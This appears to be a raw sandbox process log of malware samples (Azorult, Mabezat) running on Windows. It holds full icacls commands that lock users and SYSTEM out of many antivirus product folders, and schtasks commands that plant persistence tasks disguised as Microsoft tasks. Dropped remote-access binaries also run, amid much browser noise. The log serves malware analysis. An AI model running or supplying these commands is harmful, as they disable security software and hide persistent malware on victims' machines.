C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:5036
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:4344
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:4524
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:4908
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:3192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:3276
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:6016
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5600
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:3932
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2784
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:4752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6016
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵PID:3228
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:3528
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4872
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:520
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:5060
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1212 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:916
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:5184
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:1876
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:1220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵PID:1748
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3136
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5508
-
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:82⤵PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:12⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:12⤵PID:5620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:82⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:82⤵PID:5540
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5236
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:82⤵PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:12⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:12⤵PID:652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:12⤵PID:3044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:12⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:12⤵PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:5132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:12⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:12⤵PID:2168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:82⤵PID:1212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:12⤵PID:1220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:12⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:12⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:12⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:12⤵PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:12⤵PID:2196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:12⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:82⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:82⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:82⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:12⤵PID:5596
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5060
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:82⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:12⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:12⤵PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:82⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:82⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 13241⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 57681⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 41841⤵PID:5616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 51441⤵PID:5352
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6124 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5284 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4344
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:1472
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2708
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5400
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5808
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:2296
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3696
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:708 -
